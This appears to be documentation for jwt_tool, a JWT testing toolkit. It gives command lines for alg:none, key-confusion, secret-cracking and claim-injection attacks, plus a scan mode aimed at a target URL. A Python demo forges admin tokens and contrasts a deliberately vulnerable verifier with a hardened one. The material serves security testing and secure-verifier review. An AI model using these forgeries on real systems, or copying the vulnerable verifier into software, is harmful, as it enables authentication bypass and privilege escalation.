Description
JWT Tool (jwt_tool) is a Python toolkit for validating, forging, scanning, and tampering with JWTs (JSON Web Tokens). It tests for known implementation flaws such as the alg:none bypass, key confusion (an RS256 token re-signed as HS256 with the server's public key), weak HMAC secrets, and other signature-handling mistakes.
Installation
BASH
git clone https://github.com/ticarpi/jwt_tool.git
cd jwt_tool
pip install -r requirements.txt
Basic Usage
BASH
# Decode a JWT
python jwt_tool.py <JWT>
# Tamper mode: interactively edit header and payload claims, then choose how to sign the result
python jwt_tool.py <JWT> -T
Advanced Usage
BASH
# alg:none attack: set alg to "none" and strip the signature
python jwt_tool.py <JWT> -X a
# Key confusion attack (RS256 → HS256): re-sign as HS256 using the server's RSA public key (-pk) as the HMAC secret
python jwt_tool.py <JWT> -X k -pk public.pem
# Dictionary attack on an HMAC (HS256/384/512) secret
python jwt_tool.py <JWT> -C -d wordlist.txt
# Inject or overwrite a payload claim (-pc name, -pv value); use -hc/-hv for header claims
python jwt_tool.py <JWT> -I -pc "role" -pv "admin"
# Run all known exploits (scan mode): this sends requests, so it needs a target URL (-t)
# and the token's position in the request (-rh header, -rc cookie, or -pd POST data)
python jwt_tool.py -t <target URL> -rc "session=<JWT>" -M at
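What the decode, tamper, alg:none, key-confusion and secret-cracking modes above do under the hood, as an added example in standard-library Python (this is not jwt_tool's own code). The tokens, the weak secret, the wordlist and the public-key PEM are constructed for the demo; the PEM is a placeholder because the attack only needs the exact bytes the server loads, not a real RSA key, and RSA verification itself is left out. The `verify_vulnerable` function shows the bug the attacks rely on, a verifier that dispatches on the token's own `alg` header, beside a `verify_hardened` version that pins the algorithm server-side:

```python
import base64
import hashlib
import hmac
import json

# Constructed sample inputs (not real keys or captured tokens).
WEAK_SECRET = b"secret123"
WORDLIST = ["password", "changeme", "secret123", "hunter2"]
PUBLIC_PEM = b"-----BEGIN PUBLIC KEY-----\nDEMO-ONLY-NOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def decode(token: str):
    """Like `jwt_tool.py <JWT>`: split into (header, payload, signature bytes) without verifying."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def encode(header: dict, payload: dict, key: bytes = None) -> str:
    """Serialise and sign: alg "none" gets an empty signature, HS256 is HMAC-SHA256 over header.payload."""
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    if header["alg"] == "none":
        sig = b""
    elif header["alg"] == "HS256":
        sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    else:
        raise ValueError(f"alg {header['alg']} not implemented in this demo")
    return signing_input + "." + b64url_encode(sig)


def forge_alg_none(token: str, **claims) -> str:
    """-X a (with -I -pc/-pv): set alg to none, drop the signature, inject claims."""
    header, payload, _ = decode(token)
    header["alg"] = "none"
    payload.update(claims)
    return encode(header, payload)


def forge_key_confusion(token: str, public_pem: bytes, **claims) -> str:
    """-X k -pk public.pem: re-sign an RS256 token as HS256 with the public key bytes as the secret."""
    header, payload, _ = decode(token)
    header["alg"] = "HS256"
    payload.update(claims)
    return encode(header, payload, key=public_pem)


def crack_hs256(token: str, wordlist):
    """-C -d wordlist.txt: recompute the HS256 tag with each candidate secret and compare."""
    signing_input, _, sig = token.rpartition(".")
    target = b64url_decode(sig)
    for word in wordlist:
        guess = hmac.new(word.encode(), signing_input.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return word
    return None


def verify_vulnerable(token: str, key: bytes) -> dict:
    """Vulnerable: trusts the token's alg, so the attacker decides how `key` is used."""
    header, payload, sig = decode(token)
    signing_input = token.rsplit(".", 1)[0].encode()
    if header["alg"] == "none":
        return payload  # unsigned token accepted as-is
    if header["alg"] == "HS256":  # `key` may be the RSA public key the server loaded for RS256
        if hmac.compare_digest(hmac.new(key, signing_input, hashlib.sha256).digest(), sig):
            return payload
        raise ValueError("bad signature")
    raise ValueError(f"alg {header['alg']} not handled in this demo")


def verify_hardened(token: str, expected_alg: str, key: bytes) -> dict:
    """Fixed: the server pins the algorithm; any other alg is rejected before signature handling."""
    header, _, _ = decode(token)
    if header.get("alg") != expected_alg:
        raise ValueError(f"alg {header.get('alg')!r} rejected, expected {expected_alg}")
    return verify_vulnerable(token, key)  # dispatch is safe now that alg cannot be chosen by the token


def rejected(fn) -> bool:
    try:
        fn()
        return False
    except ValueError:
        return True


def demo() -> dict:
    """Run the attacks against both verifiers and return what each one accepted."""
    legit = encode({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "role": "user"}, key=WEAK_SECRET)
    # An RS256 token as the server would issue it; the signature bytes are a constructed placeholder.
    rs_tok = (b64url_encode(b'{"alg":"RS256","typ":"JWT"}') + "."
              + b64url_encode(b'{"sub":"alice","role":"user"}') + "." + b64url_encode(b"\x00" * 256))
    none_tok = forge_alg_none(legit, role="admin")
    confused = forge_key_confusion(rs_tok, PUBLIC_PEM, role="admin")
    return {
        "cracked_secret": crack_hs256(legit, WORDLIST),
        "alg_none_vulnerable": verify_vulnerable(none_tok, PUBLIC_PEM)["role"],
        "key_confusion_vulnerable": verify_vulnerable(confused, PUBLIC_PEM)["role"],
        "alg_none_hardened_rejected": rejected(lambda: verify_hardened(none_tok, "HS256", WEAK_SECRET)),
        "key_confusion_hardened_rejected": rejected(lambda: verify_hardened(confused, "RS256", PUBLIC_PEM)),
        "legit_hardened": verify_hardened(legit, "HS256", WEAK_SECRET)["role"],
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The two forged tokens are accepted by `verify_vulnerable` and rejected by `verify_hardened` for the same reason: the vulnerable verifier lets the `alg` header select both the algorithm and the meaning of its key material, while the hardened one compares `alg` against a server-side constant first. When reviewing a real verifier, look for that same property: the accepted algorithm list must come from configuration, never from the token, and HMAC and RSA keys should be loaded through separate, typed code paths so a PEM can never end up as an HMAC secret.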